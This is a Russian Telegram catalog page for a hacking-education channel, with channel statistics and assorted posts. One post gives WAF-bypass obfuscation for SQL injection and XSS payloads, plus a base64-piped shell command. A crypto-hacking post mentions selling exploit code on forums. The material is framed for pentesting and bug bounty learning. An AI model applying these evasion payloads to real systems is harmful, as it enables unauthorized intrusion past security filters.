КАК Я СТАЛ ХАКЕРОМ
СтатистикаОбразовательный канал на тему кибербезопасности Связь - @linuxson Разместить рекламу - https://telega.in/c/howibecameahacker
- Последний пост
- 13 дек.
- Последнее чтение
- 14 авг.
- Постов за неделю
- 0
- Всего постов
- 20
- Тип
- открытый
- Язык
- русский
- В каталоге с
- 13 авг.
- 1/24сутки в ленте
- —
- 1/48двое суток
- —
- 1/72трое суток
- —
Оценка по просмотрам недавних постов: пост набирает почти всё за первые сутки.
Посты
🪙Крипто хакинг (про web3) Я долго собирал информацию на эту тему, что бы рассказать вам, как знания хакинга можно комбинировать с web3. Web3 - блокчейн. Блокчейн - крипта. Крипта = деньги. Для рядового хакера, понимание того, как работают EVM сети, отправка транзакций через RPC и знание DEX приложений, открывают столько же дверей, как и web2. Но на форумах за такой код заказчики платят на порядок больше, так как работаете вы непосредственно с рынком денег. Более того, если вы хорошо разбираетесь в Solidity, вы можете проводить аудит смарт-контрактов (как BugBounty), писать свои смарт контракты, работать в команде криптанов или находить и эксплуатировать уязвимости, работая на себя. Порог входа? Для начала обязательно понимание основ блокчейна и знать хотя бы один, а лучше два языка - Python и JavaScript на базовом уровне. Дальше дело практики и изучение библиотек, но самое сложное - найти того, кто всё понятно объяснит. Поэтому советую начать с этой статьи.
Ну что, живы все? 👋 Понимаю, что конкретно пропал. Честно думал вернуться быстрее, но всё затянулось — вы же знаете как это бывает, начал одно, оно тянет за собой другое, потом третье, и вот уже месяц прошёл незаметно. Заодно немного отдохнул, если честно. Реально нужен был перерыв, голова уже не варила нормально. Ну и между делом успел запилить одну штуку, которая давно в планах висела. Пока молчу что это, но получилось прикольно на мой взгляд. Сами скоро увидите. Ладно, хватит интриговать. Просто хотел сказать что я тут, никуда не делся. Постепенно буду возвращаться к активности, есть чем поделиться. Кто остался - респект вам, спасибо что не отписались 😘
без подписи
без подписи
без подписи
без подписи
без подписи
без подписи
без подписи
без подписи
без подписи
🤝Как мы подружились с AI-ревью Если код-ревью утомляет и забирает ресурс на выполнение других задач, а личного ревьюера на полную ставку так и не появилось — самое время что-то менять. 🎯Руководитель группы разработки ЛК Александр Федотов первым в команде подключил AI-ревью и написал об этом в статье на Хабр. Сразу стало понятно, что это штука не для «затестить», а реальный инструмент. Преимуществами нашего нового AI-помощника поделились с вами в карточках⬆️
Советую к ознакомлению, годная статья
Ни на что не намекаю, но может у кого то есть лишние бусты? 🙈 https://t.me/boost/howibecameahacker
Новое видео на канале, давно хотел сделать видосик на эту тему. Только давайте не душните особо 🔫😊🔫 https://www.youtube.com/watch?v=MZ7KDxpI_xo
На следующей неделе попробую тестовый формат контента для телеги, короткие видосы с разбором лаб, cve, ctf челленджей
без подписи
☺️ Payload Obfuscation: Практические техники Обфускация пейлоадов — критический навык для пентестеров и баг-хантеров. Суть проста: замаскировать вредоносный код так, чтобы он прошёл через WAF, фильтры и валидацию, но сохранил функциональность при выполнении. 🔤URL Encoding Базовый payload: ' OR 1=1-- - Single encoding: %27%20OR%201%3D1%2D%2D%20%2D Double encoding (% → %25): %2527%2520OR%25201%253D1%252D%252D%2520%252D 🔤Unicode/Hex/Octal для XSS Unicode варианты: \u003Csvg onload=alert(1)\u003E \u{3C}svg onload=alert(1)\u{3E} Hex: \x3Csvg onload=alert(1)\x3E Octal: \074svg onload=alert(1)\076 Mixed encoding: \u{3C}svg%20onload\075al\u0065rt(1)\x3E Variable Expression (JavaScript) a="al";b="ert";c="(1";d=")";eval(a+b+c+d); c="ale";Function(c+"rt()")() 🔤Array-based обфускация (PHP) Payload: http://example.com/?id[]=1)/*&id[]=*/OR/*&id[]=*/1=(SELECT/*&id[]=*/SLEEP(4))+--+- Результат после join: 1)/*,*/OR/*,*/1=(SELECT/*,*/SLEEP(4)) -- - 🔤Shell обфускация Базовая команда: id Hex escape: $'\x69\x64' Комплексная: {e'c'ho,a'W''Q'K}|{bas'e'64,-d}|s''h
Полезные расширения для для багбаунти 😀FireFox 🔍 Link Gopher 🔍 Adblock Plus 🔍 FoxyProxy Standard 🔍 Video Speed Controller 🔍 Check XSS 🔍 HackTools 🔍 Bulk URL Opener 🔍 Temp Mail 🔍 JS Beautify CSS HTML 🔍 Multi-Account Containers 😀Chrome 🌐 TruffleHog 🌐 Code Formatter 🌐 Freedium Extension 🌐 BuiltWith 🌐 Wappalyzer 🌐 WhatRuns 🌐 Retire.js 🌐 Cookie Extractor 🌐 Wayback Machine 🌐 EXIF Data Viwer 🌐 Shodan 🌐 S3 Bucket List 🌐 Ublock Origin 🌐 Resources Saver 🌐 Dot Git 🌐 EndPointer
Хочешь узнать как живёт и двигается один из топов RU Багбаунти? Тогда тебе ко мне! 🔥 Всем привет! Меня зовут rolegiv и последние 11 месяцев часть моей жизни — это поиск уязвимостей. Всё началось со смешного отчёта за который мне до сих пор стыдно... Но мы сейчас не об этом! С тех пор я успел: 😀Ворваться в топ-4 рейтинга Standoff365 😀Ворваться в топ-32 рейтинга BI.ZONE 😀Топ-2 на Standoff Hacks Ahmedabad 😀Топ-5 на приватке от ВК 😀Топ-5 на BUGS ZONE 5.0 Я решил создать канал, чтобы делиться всем, что узнаю на этом пути: разбирать свои и чужие кейсы, рассказывать о плюсах и минусах разных программ и просто говорю о Российском баг баунти, что происходит в индустрии помимо поиска багов. Подписывайся, если тебе интересен реальный опыт, а не скучные технические посты. Будем газовать вместе 🔥🔥🔥🇷🇺 🌂@rolegiv_BugBounty